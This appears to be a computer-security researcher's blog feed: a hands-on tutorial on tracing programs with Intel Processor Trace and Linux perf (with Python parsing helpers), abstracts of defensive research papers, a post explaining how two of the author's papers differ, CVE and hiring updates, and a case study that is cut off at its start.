Carter Yagemann
https://carteryagemann.com/
<a href="https://cse.osu.edu/people/yagemann.1">Assistant Professor of Computer Science and Engineering at the Ohio State University with interests in automated vulnerability discovery, root cause analysis, and exploit prevention.</a>

CheatFighter to Appear in RAID'23
Carter Yagemann, 2023-07-21T09:20:00-04:00
<p>My coauthors and I will be presenting the paper "Extracting Threat Intelligence From Cheat
Binaries For Anti-Cheating" at <a href="https://raid2023.org/">RAID 2023</a> in October. Below is a preview
of the abstract:</p>
<blockquote>
<p>Rampant cheating remains a serious concern for game developers who fear losing loyal customers
and revenue. While numerous anti-cheating techniques have been proposed, cheating persists in
a vibrant (and profitable) illicit market. Inspired by novel insights into the economics
behind cheat development and recent techniques for defending against advanced persistent
threats (APTs), we propose a fully automated methodology for extracting "cheat intelligence"
from widely distributed cheat binaries to produce a "memory access graph" that guides
selective data randomization to yield immune game clients. We have implemented a prototype
system for Android and Windows games, CheatFighter, and evaluated it on 86 cheats collected
from a variety of real-world sources, including Telegram channels and online forums.
CheatFighter successfully counteracts 80 of the real-world cheats in under a minute,
demonstrating practical end-to-end protection against widespread cheating.</p>
</blockquote>
A Practical Beginner's Guide to Intel Processor Trace
Carter Yagemann, 2023-02-24T07:00:00-05:00
<p>Greetings, if you're reading this tutorial, chances are you have some interest
in Intel Processor Trace (PT) and how it can improve your debugging or program
analysis capabilities, but aren't sure how to get started. This is
understandable, given that there aren't many practical tutorials on Intel PT and
what documentation is publicly available is scattered across Intel specifications,
Linux documentation, and nuggets of text in various smaller projects. The
existing text targets a wide range of audiences, from low-level driver
developers to experienced software engineers. Most, if not all, of that text is
not newcomer-friendly, and it's easy to spend hours sifting through it only to
find your basic questions unanswered.</p>
<p>With this in mind, I've written this tutorial to fulfill two goals. The first is
to get newcomers up and running with Intel PT in as few steps as possible.
This is a hands-on tutorial for people who want to quickly get hacking. In
the process, I hope to also reveal to you what makes Intel PT so powerful and
why it's my go-to technology for any project involving dynamic program analysis. My
second goal is to then point you to the various sources of more technical
information with prefaces of what you'll find in each destination, so you can
focus your exploration based on your ultimate needs and higher goals.</p>
<p>So with all that clarified, let's dive in.</p>
<h2>Background: What is Intel PT?</h2>
<p>If you stumbled upon this tutorial by chance and have no clue what Intel PT is,
let's start with some background information and a bit of history. Readers who
already know about Intel PT or don't care for a history lesson should skip to
the next section.</p>
<p>Intel PT is one of a long line of hardware features developed and released by
Intel to help developers gain better insights into how their software runs on
Intel processors for debugging and performance profiling. If you're using an
Intel processor built within the past decade, chances are it includes Intel PT.</p>
<p>Intel PT is a spiritual successor to technologies like hardware performance
counters. Performance counters are an excellent solution if you want to know
statistical information about the performance behaviors of a particular piece of
code, like how often it encounters cache misses, but performance counters can't
tell you much at a per-instruction granularity.</p>
<p>Intel PT aims to address this
shortcoming by providing <em>execution traces</em> as opposed to just a set of counter
registers. Each trace is a stream of packets representing different events, such
as whether a branch was taken, how many processor cycles have elapsed, and so
forth. These packets are flushed directly into physical memory, asynchronously,
bypassing all caches, to enable recording of traces with minimal impact on the
target program.</p>
<p>The original intended purpose of Intel PT was to enable advanced debugging and
profiling of performance-sensitive code. Intel PT yields precise information
about executed instruction sequences, timing, and even energy consumption, to
accurately record software behaviors without the overhead or artifacts that
instrumentation code would introduce, such as cache interference. However, while
Intel PT was originally intended for debugging and profiling, it is also an
extremely powerful tool for guiding program analysis, which is why I use it
extensively in my security research projects. Unlike any other technique
currently available, Intel PT enables me to transparently observe feasible paths
and timing information for real-world executions with only about a 2% performance
impact on the target program. It can also successfully yield traces in many
tricky programs that break instrumentation tools like Intel PIN or DynamoRIO.
This makes it my go-to technology for collecting data to fuel my security
solutions.</p>
<h2>Getting Started: Linux Perf</h2>
<p>The fastest way to start using Intel PT is to set up a Linux computer with an
Intel CPU and install Perf. <strong>Note that at the time of writing, Intel PT does
not play nicely with virtual machines or containers, so you'll need a computer
that runs Linux as its native operating system.</strong> I'm going to walk through the
steps using a Debian system, but the same steps should work for Ubuntu or (with
a bit of tweaking) any other Linux system.</p>
<p><strong>Step 1: Install Perf.</strong>
Most Linux distributions include Perf as a package
that can be installed via the default package manager. For Debian, you can
install it by opening a terminal and running:</p>
<div class="highlight"><pre><span></span><code>sudo apt install linux-perf
</code></pre></div>
<p>Be aware that since this package installs an additional kernel driver with some
beefy startup behaviors, you may need to reboot your system at this point before
proceeding.</p>
<p><strong>Step 2: Verify Intel PT is available.</strong>
Once Perf is installed, we should verify that it can access Intel PT. We can
check this with the <code>perf list</code> command:</p>
<div class="highlight"><pre><span></span><code>$ perf list | grep intel_pt
intel_pt// [Kernel PMU event]
</code></pre></div>
<p>If the above command prints no lines, then it means either your CPU doesn't have
Intel PT or it provides a very old version that lacks all the features required
to work with Perf.</p>
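<p>If you'd rather run this check from a script than grep <code>perf list</code>, here is a minimal Python sketch. It assumes the kernel registers the Intel PT PMU as a directory named <code>intel_pt</code> under <code>/sys/bus/event_source/devices</code>, with a <code>caps</code> subdirectory listing supported features. The function names are hypothetical helpers of my own.</p>

```python
from pathlib import Path
from typing import Dict

# Assumed location where perf_events exposes registered PMUs.
PMU_ROOT = Path("/sys/bus/event_source/devices")


def intel_pt_pmu_available(pmu_root: Path = PMU_ROOT) -> bool:
    """Return True if an `intel_pt` PMU directory is present."""
    return (pmu_root / "intel_pt").is_dir()


def read_intel_pt_caps(pmu_root: Path = PMU_ROOT) -> Dict[str, str]:
    """Map each file in intel_pt/caps to its stripped text contents."""
    caps_dir = pmu_root / "intel_pt" / "caps"
    if not caps_dir.is_dir():
        return {}
    return {
        entry.name: entry.read_text().strip()
        for entry in sorted(caps_dir.iterdir())
        if entry.is_file()
    }
```

<p>Calling <code>intel_pt_pmu_available()</code> with no arguments checks the live sysfs tree. The <code>pmu_root</code> parameter only exists so the functions can be pointed at a test directory.</p>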
<p><strong>Step 3: Adjust paranoid mode.</strong>
By default, Perf only allows <code>root</code> to use Intel PT because it reveals a lot of
information about traced programs. If you want to allow any user to access Intel
PT, you can temporarily disable this restriction by running the command:</p>
<div class="highlight"><pre><span></span><code>echo -1 | sudo tee /proc/sys/kernel/perf_event_paranoid
</code></pre></div>
<p>If you want to permanently disable it, you can add the following line to
<code>/etc/sysctl.conf</code>:</p>
<div class="highlight"><pre><span></span><code>kernel.perf_event_paranoid=-1
</code></pre></div>
<p>If you decide to leave this setting at its default level, be aware that
you'll need to run the subsequent commands in this tutorial as <code>root</code>
(or use <code>sudo</code>).</p>
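<p>This check can also be scripted. Below is a small Python sketch that reads the current level from <code>/proc/sys/kernel/perf_event_paranoid</code> and applies the simplified rule above: anything other than <code>-1</code> means run as <code>root</code>. The helper names are hypothetical. The rule deliberately ignores the finer distinctions between the non-negative levels.</p>

```python
import os
from pathlib import Path

PARANOID_PATH = Path("/proc/sys/kernel/perf_event_paranoid")


def read_perf_event_paranoid(path: Path = PARANOID_PATH) -> int:
    """Parse the integer paranoid level from procfs (or a test file)."""
    return int(path.read_text().strip())


def must_run_as_root(paranoid: int, euid: int) -> bool:
    """Tutorial rule of thumb: unless the level is -1, non-root users need sudo."""
    return paranoid > -1 and euid != 0


def should_use_sudo() -> bool:
    """Apply the rule of thumb to the live system (Linux only)."""
    return must_run_as_root(read_perf_event_paranoid(), os.geteuid())
```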
<p><strong>Step 4: Recording traces.</strong>
We can record traces using the <code>perf record</code> command. For this tutorial, I'll
use <code>/bin/ls</code> as my target program. Let's start with the most basic tracing:</p>
<div class="highlight"><pre><span></span><code>$ perf record -e intel_pt//u -- /bin/ls
perf.data
[ perf record: Woken up 1 times to write data ]
[ perf record: Captured and wrote 0.043 MB perf.data ]
</code></pre></div>
<p>In this example, <code>perf record</code> tells Perf that I want to record something,
<code>-e intel_pt</code> specifies that I want to record an Intel PT trace, and <code>//u</code> specifies
that I want to record only the user-space portion of the program's execution
(Intel PT can also record kernel execution) using the default Intel PT settings
(more on this later). Everything after the <code>--</code> is the command that'll
be executed and traced.</p>
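<p>If you end up driving Perf from your own tooling, it can help to build the event spec programmatically. The Python sketch below mirrors the syntax just described: the event name, then Intel PT settings between the slashes (empty means defaults), then modifiers such as <code>u</code>. It also builds the full <code>perf record</code> argument list, using Perf's <code>-o</code> flag to name the output file. The helper names are hypothetical, and nothing here runs Perf itself.</p>

```python
from typing import List, Mapping, Optional, Sequence


def intel_pt_event(settings: Optional[Mapping[str, int]] = None,
                   modifiers: str = "u") -> str:
    """Format an Intel PT event spec, e.g. 'intel_pt//u' or 'intel_pt/cyc=1/u'."""
    terms = ",".join(f"{key}={value}" for key, value in (settings or {}).items())
    return f"intel_pt/{terms}/{modifiers}"


def perf_record_argv(target: Sequence[str],
                     settings: Optional[Mapping[str, int]] = None,
                     modifiers: str = "u",
                     output: str = "perf.data") -> List[str]:
    """Build the argument list for `perf record` tracing `target` with Intel PT."""
    return [
        "perf", "record",
        "-e", intel_pt_event(settings, modifiers),
        "-o", output,   # file that receives the trace and sideband
        "--", *target,  # everything after -- is the traced command
    ]
```

<p>On a machine with Intel PT, you could hand the result to <code>subprocess.run(argv, check=True)</code>. Non-default settings, like the <code>cyc</code> options discussed below, go in the <code>settings</code> mapping.</p>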
<p>You'll notice that Perf prints some extra messages after
the program finishes executing with useful information like how big the final
trace is. <strong>Be aware that it is possible for a program to generate too much
data for Intel PT and Perf to flush to storage in time, in which case the trace
will contain holes. Perf's messages will warn you if this occurs.</strong></p>
<p>If everything ran successfully, you should now have a <code>perf.data</code> file in your
current working directory. This file contains the Intel PT trace along with some
<em>sideband</em> data recorded by Perf's driver. This sideband records things like
where objects were mapped into memory and when context switches between tasks
occurred, which is needed in order to recover the executed instruction sequence
and untangle threads if your target program runs on multiple CPU cores
simultaneously.</p>
<p><strong>Step 5: Decoding and recovery.</strong>
In Intel PT terminology, we first have to <em>decode</em> the <code>perf.data</code> file to
extract the trace of Intel PT events, and then combine that with the recorded
sideband to <em>recover</em> the instruction execution sequence. Fortunately, Perf
comes with scripts that can do this all for us in one step.</p>
<p>The simplest (and in my opinion, most useful) command is the following:</p>
<div class="highlight"><pre><span></span><code>perf script --insn-trace
</code></pre></div>
<p>Note that by default, <code>perf script</code> tries to read <code>./perf.data</code>. If your Perf
output file is in another location or has a different name, you can specify its
path using the <code>-i</code> flag.</p>
<p>This script recovers and prints the exact sequence of instructions our target
program executed. Specifically, each line has the following format:</p>
<div class="highlight"><pre><span></span><code> ls 832828 [027] 8105202.171292271: 7fa2165d4c22 do_system+0x372 (/usr/lib/x86_64-linux-gnu/libc-2.31.so) insn: 31 c0
^Executable^ ^Task ID^ ^CPU Core #^ ^Estimated Timestamp^ ^Virtual Address^ ^Symbol Offset^ ^Object^ ^Instruction Bytes^
</code></pre></div>
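<p>To post-process this output in your own tooling, you can parse each line back into its fields. Here is a minimal Python sketch that assumes every line follows exactly the layout shown above. Other Perf versions or options will change the format; for example, <code>--xed</code> prints assembly instead of raw bytes. Lines that don't match return <code>None</code>. <code>InsnRecord</code> and <code>parse_insn_line</code> are hypothetical names.</p>

```python
import re
from dataclasses import dataclass
from typing import Optional

# Matches the field layout shown above (an assumption about the exact format).
LINE_RE = re.compile(
    r"^\s*(?P<comm>\S+)\s+(?P<tid>\d+)\s+\[(?P<cpu>\d+)\]\s+"
    r"(?P<sec>\d+)\.(?P<frac>\d+):\s+(?P<addr>[0-9a-f]+)\s+(?P<sym>\S+)\s+"
    r"\((?P<obj>[^)]*)\)\s+insn:\s*(?P<insn>[0-9a-f]{2}(?: [0-9a-f]{2})*)\s*$"
)


@dataclass
class InsnRecord:
    comm: str          # executable name
    tid: int           # task ID
    cpu: int           # CPU core number
    timestamp_ns: int  # estimated timestamp, in nanoseconds
    addr: int          # virtual address of the instruction
    symbol: str        # symbol+offset
    obj: str           # object file containing the instruction
    insn: bytes        # raw instruction bytes


def parse_insn_line(line: str) -> Optional[InsnRecord]:
    """Parse one line of `perf script --insn-trace` output, or return None."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    # Keep the timestamp as an integer to avoid float rounding at ns scale.
    frac_ns = int(m["frac"].ljust(9, "0")[:9])
    return InsnRecord(
        comm=m["comm"],
        tid=int(m["tid"]),
        cpu=int(m["cpu"]),
        timestamp_ns=int(m["sec"]) * 1_000_000_000 + frac_ns,
        addr=int(m["addr"], 16),
        symbol=m["sym"],
        obj=m["obj"],
        insn=bytes.fromhex(m["insn"]),
    )
```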
<p>With this information, we now know the exact order instructions were executed,
where those instructions resided in memory, how to map those instructions back to
the original program and library files, and more. We can then use this
information to, for example, build control flow graphs and other representations
for program analysis.</p>
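<p>As one example of that kind of analysis, here is a Python sketch that counts the non-sequential control transfers in a trace: taken branches, jumps, calls, and returns. These are the edges you would add on top of fall-through edges when building a dynamic control flow graph. It assumes the trace has already been reduced to <code>(address, instruction length)</code> pairs for a <em>single</em> task ID, in execution order. Interleaved threads, or a trace with holes, would produce spurious edges. <code>control_transfers</code> is a hypothetical helper.</p>

```python
from collections import Counter
from typing import Iterable, Optional, Tuple


def control_transfers(trace: Iterable[Tuple[int, int]]) -> Counter:
    """Count non-sequential (src, dst) transitions in a single-thread trace.

    `trace` yields (address, instruction_length) pairs in execution order.
    A transition is non-sequential when the next address differs from the
    fall-through address (address + length) of the previous instruction.
    """
    edges: Counter = Counter()
    prev: Optional[Tuple[int, int]] = None
    for addr, length in trace:
        if prev is not None:
            prev_addr, prev_len = prev
            if addr != prev_addr + prev_len:
                edges[(prev_addr, addr)] += 1
        prev = (addr, length)
    return edges
```

<p>A branch whose target happens to be its own fall-through address is indistinguishable from sequential execution here, which is usually acceptable for building graphs.</p>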
<p>If this is too granular for your desired use case, there are also other scripts
that can process the trace into coarser representations. For example,
<code>--call-trace</code> will print only the function calls (along with their call depth),
which you can use to extract a call graph for the execution. You can access the
full manual for <code>perf script</code> by running <code>man perf-script</code>.</p>
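<p>Turning call-trace output into a call graph is mostly stack bookkeeping. The Python sketch below assumes you have already extracted <code>(call depth, function name)</code> pairs from the <code>--call-trace</code> output in execution order, with depth 0 for the outermost function. I've left out that extraction step rather than guess at the exact text layout. <code>call_graph</code> is a hypothetical helper.</p>

```python
from collections import Counter
from typing import Iterable, List, Optional, Tuple


def call_graph(calls: Iterable[Tuple[int, str]]) -> Counter:
    """Count caller->callee edges from (depth, function) pairs in call order."""
    stack: List[Optional[str]] = []  # stack[d] = active function at depth d
    edges: Counter = Counter()
    for depth, func in calls:
        del stack[depth:]            # drop frames at this depth or deeper
        while len(stack) < depth:    # trace began mid-stack: unknown callers
            stack.append(None)
        caller = stack[-1] if stack else None
        if caller is not None:
            edges[(caller, func)] += 1
        stack.append(func)
    return edges
```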
<h2>Additional Noteworthy Tricks</h2>
<p><strong>Disassembling instructions.</strong>
You may have noticed that our instruction trace prints the raw bytes of the
instructions instead of printing them in nice human-readable assembly. This is
because in order to disassemble them, Perf needs access to a disassembler.
Specifically, Perf integrates with Xed, which is Intel's official disassembler.</p>
<p>Unfortunately, the default APT repositories for Debian don't include a Xed
package, so we'll need to compile and install Xed manually. Here's one way
I've found to do this:</p>
<div class="highlight"><pre><span></span><code>git clone https://github.com/intelxed/xed.git xed
git clone https://github.com/intelxed/mbuild.git mbuild
cd xed
./mfile.py examples
sudo cp ./obj/wkit/bin/xed /usr/local/bin/xed
</code></pre></div>
<p>Now that we've installed Xed, we can use the <code>--xed</code> flag with <code>perf script</code>:</p>
<div class="highlight"><pre><span></span><code>perf script --insn-trace --xed
</code></pre></div>
<p>And now the instruction bytes are replaced with human-readable assembly.</p>
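<p>If you script your trace processing, you may want it to fall back gracefully on machines without Xed. Here is a minimal Python sketch. It assumes Perf finds Xed through the <code>xed</code> executable on your <code>PATH</code>, which is why we copied it to <code>/usr/local/bin</code>. <code>insn_trace_argv</code> is a hypothetical helper.</p>

```python
import shutil
from typing import Callable, List, Optional


def insn_trace_argv(data_path: str = "perf.data",
                    which: Callable[[str], Optional[str]] = shutil.which) -> List[str]:
    """Build a `perf script --insn-trace` command, adding --xed if xed is on PATH."""
    argv = ["perf", "script", "--insn-trace", "-i", data_path]
    if which("xed") is not None:
        argv.append("--xed")  # disassemble instead of printing raw bytes
    return argv
```

<p>The <code>which</code> parameter only exists so the lookup can be swapped out in tests. Pass the returned list to <code>subprocess.run</code> to execute it.</p>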
<p><strong>Adjusting Timestamp Accuracy.</strong>
As I pointed out in Step 5, part of the output from <code>perf script --insn-trace</code>
includes an estimated timestamp of when each instruction executed. I emphasize
the word <em>estimated</em> because the accuracy of this timestamp depends on how
frequently we configure Intel PT to record timing packets.</p>
<p>To keep this tutorial concise, I won't go into the details of what the different
timing packets are and their trade-offs, but I'll show you how to adjust them as
an example of how to change Intel PT settings in <code>perf record</code>. We can specify
any non-default Intel PT settings like so:</p>
<div class="highlight"><pre><span></span><code>$ perf record -e intel_pt/cyc=1,cyc_thresh=0/u -- /bin/ls
perf.data
[ perf record: Woken up 1 times to write data ]
[ perf record: Captured and wrote 0.074 MB perf.data ]
</code></pre></div>
<p>In this case, what I've added is <code>cyc=1</code>, which enables the generation of CYC
timing packets by Intel PT, and <code>cyc_thresh=0</code>, which tells Intel PT to output
these packets as frequently as possible. If you look closely, you'll notice
the trace size has grown by roughly 70% as a result (from 0.043 MB to 0.074 MB),
so be mindful of this when deciding how accurate you need the timestamps to be.</p>
<p>If we now rerun <code>perf script --insn-trace</code>, we'll see that the estimated
timestamp updates more frequently; however, it still isn't updated after every
instruction. This is due to a limitation of Intel PT, but the specifics are
outside the scope of this tutorial.</p>
<p>One final useful bit of information regarding timing: if we add
<code>-F+ipc</code> to our <code>perf script</code> command, it'll periodically print out fields like
<code>IPC: 4.14 (29/7)</code>. IPC stands for <em>instructions per cycle</em>, and in this
example, it's saying that the previous 29 instructions executed in 7 clock
cycles. This gives us a bit more insight into how the timestamps are changing.</p>
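<p>Each IPC field is just the ratio of the two counts in parentheses, so you can check it, or aggregate several fields, yourself. Here is a Python sketch that assumes the field always has the <code>IPC: x (instructions/cycles)</code> shape shown above. The helper names are hypothetical. The overall IPC across several fields is total instructions over total cycles, not the average of the individual ratios.</p>

```python
import re
from typing import Iterable, Optional, Tuple

# Matches fields like "IPC: 4.14 (29/7)" (assumed format, as shown above).
IPC_RE = re.compile(r"IPC:\s*(\d+\.\d+)\s*\((\d+)/(\d+)\)")


def parse_ipc(text: str) -> Optional[Tuple[float, int, int]]:
    """Return (reported IPC, instructions, cycles) from an IPC field, if present."""
    m = IPC_RE.search(text)
    if m is None:
        return None
    return float(m[1]), int(m[2]), int(m[3])


def overall_ipc(samples: Iterable[Tuple[int, int]]) -> float:
    """Aggregate (instructions, cycles) samples as total insns / total cycles."""
    total_insns = total_cycles = 0
    for insns, cycles in samples:
        total_insns += insns
        total_cycles += cycles
    if total_cycles == 0:
        raise ValueError("no cycles recorded")
    return total_insns / total_cycles
```

<p>For the example field, 29 / 7 is about 4.1429, which Perf displays rounded to 4.14.</p>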
<h2>Further Reading</h2>
<p>This concludes the basics of how to use Intel PT via Perf. From here, there are
several documents you can read to gain more technical information:</p>
<p>If you want to know more about the Intel PT specification, including how to
program Intel PT with a driver, what all the packets do, and how to perform
instruction recovery, check out the
<a href="https://www.intel.com/content/www/us/en/developer/articles/technical/intel-sdm.html">Intel Architectures Software Developer's Manuals</a>
(ASDM). The chapters get shifted around as the manual is updated, but at the
time of writing the chapter on Intel PT is located in Volume 3, Chapter 33.</p>
<p>If for some reason you do not want to rely on Perf to decode traces or you want
to integrate decoding and recovery directly into your own program,
<a href="https://github.com/intel/libipt">libipt</a> is a good starting point that offers
standalone tools and a library for processing Intel PT data.</p>
<p>If you would like to learn more about Perf's Intel PT features, including all
the other available command line arguments and other use cases like tracing
kernel executions or KVM, see Linux's
<a href="https://github.com/torvalds/linux/blob/master/tools/perf/Documentation/perf-intel-pt.txt">documentation</a>.</p>
VulChecker Accepted to USENIX 2023
Carter Yagemann, 2022-09-23T10:35:00-04:00
<p>My coauthors and I will be presenting our work on detecting bugs in source code
using machine learning at
<a href="https://www.usenix.org/conference/usenixsecurity23">USENIX Security 2023</a>.
Below is a preview of the abstract:</p>
<blockquote>
<p>In software development, it is critical to detect vulnerabilities in a project
as early as possible. Although, deep learning has shown promise in this task,
current state-of-the-art methods cannot classify and identify the line on
which the vulnerability occurs. Instead, the developer is tasked with
searching for an arbitrary bug in an entire function or even larger region of
code.</p>
<p>In this paper, we propose VulChecker: a tool that can precisely locate
vulnerabilities in source code (down to the exact instruction) as well as
classify their type (CWE). To accomplish this, we propose a new program
representation, program slicing strategy, and the use of a message-passing
graph neural network to utilize all of code's semantics and improve the reach
between a vulnerability's root cause and manifestation points.</p>
<p>We also propose a novel data augmentation strategy for cheaply creating strong
datasets for vulnerability detection in the wild, using free synthetic samples
available online. With this training strategy, VulChecker was able to identify
24 CVEs (10 from 2019 & 2020) in 19 projects taken from the wild, with nearly
zero false positives compared to a commercial tool that could only detect 4.
VulChecker also discovered an exploitable zero-day vulnerability, which has
been reported to developers for responsible disclosure.</p>
</blockquote>
PUMM Accepted to USENIX 2023
Carter Yagemann, 2022-09-02T20:00:00-04:00
<p>My coauthors and I will be presenting our work on preventing use-after-free and
double free vulnerabilities at
<a href="https://www.usenix.org/conference/usenixsecurity23">USENIX Security 2023</a>.
Below is a preview of the abstract:</p>
<blockquote>
<p>Critical software is written in memory unsafe languages that
are vulnerable to use-after-free and double free bugs. This has
led to proposals to secure memory allocators by strategically
deferring memory reallocations long enough to make such
bugs unexploitable. Unfortunately, existing solutions suffer
from high runtime and memory overheads. Seeking a better
solution, we propose to profile programs to identify units
of code that correspond to the handling of individual tasks.
With the intuition that little to no data should flow between
separate tasks at runtime, reallocation of memory freed by the
currently executing unit is deferred until after its completion;
just long enough to prevent use-after-free exploitation.
To demonstrate the efficacy of our design, we implement
a prototype for Linux, PUMM, which consists of an offline
profiler and an online enforcer that transparently wraps standard
libraries to protect C/C++ binaries. In our evaluation
of 40 real-world and 3,000 synthetic vulnerabilities across
26 programs, including complex multi-threaded cases like
the Chakra JavaScript engine, PUMM successfully thwarts
all real-world exploits, and only allows 4 synthetic exploits,
while reducing memory overhead by 52.0% over prior work
and incurring an average runtime overhead of 2.04%.</p>
</blockquote>
Differentiating ARCUS (USENIX'21) and Bunkerbuster (CCS'21)
Carter Yagemann, 2022-08-31T13:00:00-04:00
<p>I've received several questions recently about two papers I published in 2021,
one at USENIX (which I'll refer to here as ARCUS) and another at CCS (which I'll
refer to as Bunkerbuster). You can find these papers at the
<a href="https://www.usenix.org/system/files/sec21-yagemann.pdf">USENIX</a> and
<a href="https://dl.acm.org/doi/pdf/10.1145/3460120.3485363">CCS</a> conference websites,
respectively.</p>
<p>The question people have is: what makes these two publications distinct from
each other? In short, how do I justify ARCUS and Bunkerbuster being two separate
publications? This question is motivated by both papers being published in the
same year, with aesthetically similar architecture diagrams, and my decision to
ultimately merge the codebases together into a
<a href="https://github.com/carter-yagemann/ARCUS">single repository</a>. Did I pull the
wool over the eyes of the reviewers (and my dissertation defense committee)?
Were my advisors asleep at the wheel? These are legitimate questions
to ask, so let me address them here.</p>
<p>For busy readers who want to get straight down to the technical brass tacks,
here is the
<a href="https://github.com/carter-yagemann/ARCUS/commit/070d0588062c6de4f087964f7c00ff280484a727">commit</a>
where ARCUS and Bunkerbuster were merged so the research community can
interrogate the roughly <em>5,600 additions</em> that Bunkerbuster contributed to
the prior ARCUS codebase. To summarize the difference in 1 sentence: ARCUS (the
first prototype) is a <em>reactive</em> system that requires traces containing exploits to
be cherry-picked by preexisting defenses, whereas Bunkerbuster (the second
prototype) is a <em>proactive</em> bug hunting system that can sift through
<em>10 times more</em> data, that <em>does not</em> contain exploits, to find and help fix
bugs, hopefully before attackers can find and exploit them in-the-wild.</p>
<p>For those who wish to read on, I'll break down my high-level explanation into
3 sections: the story of how ARCUS was created, how the findings and unsolved
problems in ARCUS then inspired the creation of Bunkerbuster, and the timeline
and hidden logistics surrounding their publications.</p>
<h2>ARCUS' Story</h2>
<p>At its essence, ARCUS (the earlier of the two prototypes) tackles a simpler
problem than Bunkerbuster. Specifically, in the ARCUS work, my collaborators and
I wrestle with how to diagnose alerts generated by host-based defenses like
intrusion detection systems or control flow integrity monitors. ARCUS is a
purely <em>reactive</em> system that relies on other defenses to accurately feed it
execution traces (captured using Intel Processor Trace) that contain low-level
binary exploits. In short, ARCUS has no exploration capabilities and its
performance is directly dependent on the false negative rate of whichever
preexisting defenses ARCUS is integrated with. If an exploit goes undetected,
ARCUS offers no assistance.</p>
<p>This is a strong prerequisite, but it was necessary in order to simplify the
research problem enough to focus on the core technical contribution of inventing
and demonstrating binary symbolic root cause analysis. To be clear, no research
occurs in a vacuum. The idea of binary symbolic analysis builds on a wealth of
prior knowledge, such as the
<a href="https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=6234425">Mayhem</a> work
published in 2012. However, accurately following real-world Intel PT
recordings symbolically, defining and implementing reliable detection
techniques for multiple classes of memory safety bug (buffer/integer overflow,
use-after-free, double free, format string), and then figuring out how to
leverage the recovered constraints to classify the root cause and propose a
preliminary patch, convinced my peers and reviewers that ARCUS was a
publication-worthy work, despite its narrow scope.</p>
<p>One other curious finding came out of the ARCUS work: it discovered
<em>4 new vulnerabilities</em> during the evaluation, even though it was analyzing
traces containing <em>known exploits</em>. This caught us by surprise and became the
kindling for a follow-up work: Bunkerbuster.</p>
<h2>Bunkerbuster's Story</h2>
<p>The goal of Bunkerbuster was to address all the shortcomings left behind by
ARCUS. Gone is the prerequisite of there being preexisting defenses on the
monitored system. In fact, we even removed the assumption that only 1 system is
being monitored. Instead, we aimed to make Bunkerbuster a <em>proactive</em>,
<em>end-to-end</em> bug hunting system, driven by <em>benign</em> recordings of production and
end-user workloads to find and fix bugs before an attacker could even attempt
exploitation in-the-wild. ARCUS was handed the needle (exploit) by a
<em>deus ex machina</em> (preexisting defenses). Bunkerbuster would have to search
the haystack.</p>
<p>Flowery analogies aside, what does that <em>really</em> mean at a technical level?
First, in Bunkerbuster, we could no longer tiptoe around exploration. Unless
Bunkerbuster could branch out into states not reached by the input traces, the
chances of finding bugs from recordings of benign executions would be
significantly reduced. To accomplish this, we
created a new plugin class for guiding state exploration (while controlling
state explosion) and designed and implemented search heuristics based
on our domain expertise of memory safety bugs.</p>
<p>Second, Bunkerbuster had to sift through significantly more Intel
PT data than ARCUS ever did because it was looking at benign executions rather
than malicious ones cherry-picked by a host-based defense. In empirical terms,
the dataset Bunkerbuster was evaluated on is <em>10 times larger</em> than the ARCUS
dataset, creating a noisy digital haystack. Bunkerbuster overcomes this
challenge, which would cripple ARCUS, using an on-the-fly hashing and snapshotting
technique that we describe in the CCS paper.</p>
<h2>Timeline and Publication Logistics</h2>
<p>The time to develop ARCUS (minus evaluation and paper writing) was about 1.5
years. Developing Bunkerbuster took an additional 1 year. So why did the papers
appear to be published so close together? The answer is conference review
cycles.</p>
<p>ARCUS was originally submitted to USENIX <em>2020</em>, and then was resubmitted to
USENIX <em>2021</em> as a major revision. This significantly inflated the time to
publication, even after all the technical work on ARCUS was completed.</p>
<p>Conversely, because my collaborators and I had already gone through the
hardships of publishing ARCUS, when we wrote the Bunkerbuster paper, we were
able to avoid many similar pitfalls and address likely reviewer critiques
upfront. As a result, Bunkerbuster was accepted to CCS 2021 without major
revision, which significantly reduced its time to publication compared to ARCUS.</p>
<p>In other words, when I gave my talk at USENIX 2021 on ARCUS, I was describing a
system that had been finished over 1 year prior. For what it's worth, I'm
currently involved in 2 papers that were submitted to USENIX <em>2022</em>, but
ended up in major revisions that were resubmitted to USENIX <em>2023</em>. Should the
reviewers accept these revisions, by the time my collaborators and I give our
conference talks, we will
be describing systems we built when I was still a PhD student, except I will now
be <em>1 full year into my assistant professorship</em> at The Ohio State University. I
point this out not to raise a fuss
about USENIX's review process, but just to emphasize that ARCUS' slow
publication timeline is not a one-time anomaly. It's just the reality of
large-scale peer review.</p>
<h2>Conclusion</h2>
<p>Hopefully this clarifies the question surrounding the publication of ARCUS and
Bunkerbuster in 2021. I'm happy to answer additional questions that the
community may have, and lastly I'd like to thank the readers who made it to the
end of this text.</p>
<p>Happy hacking!</p>
Update Regarding Halibut Bugs (CVE-2021-42612, CVE-2021-42613, CVE-2021-42614)
Carter Yagemann, 2022-06-03T11:45:00-04:00
<p>The bugs that I found using <a href="https://github.com/carter-yagemann/arcus">ARCUS</a> in
Halibut last year have been issued 3 CVE IDs:</p>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-42612">CVE-2021-42612</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-42613">CVE-2021-42613</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-42614">CVE-2021-42614</a></li>
</ul>
<p>To the best of my knowledge, these bugs are now fixed in the latest release
version, which at the time of writing is 1.3. Please refer to Halibut's
<a href="https://www.chiark.greenend.org.uk/~sgtatham/halibut/">project website</a>
for more details.</p>
Faculty Position at The Ohio State University
Carter Yagemann, 2022-03-13T10:40:00-04:00
<p>I have accepted an offer to become an Assistant Professor at The Ohio State
University, starting in the Fall 2022 semester.</p>
<p><strong>I am currently looking to hire 1 Ph.D. student as a full-time graduate
research assistant (GRA).</strong> If you are an incoming student and you're interested
in cutting-edge techniques for automatically finding and fixing severe software
<a href="https://github.com/carter-yagemann/arcus#analyzing-root-cause-using-symbex-arcus">vulnerabilities</a>,
let's have a chat. You can find my email address in
<a href="https://dl.acm.org/doi/pdf/10.1145/3427228.3427241">this publication</a>.</p>Case Study: Security Analysis of Halibut2021-10-12T17:30:00-04:002021-10-12T17:30:00-04:00Carter Yagemanntag:carteryagemann.com,2021-10-12:/halibut-case-study.html<p>Over the past year I've been studying memory corruption vulnerabilities in Linux
C/C++ programs, culminating in the open sourcing of a framework called
<a href="https://github.com/carter-yagemann/arcus">ARCUS</a> to find and explain them
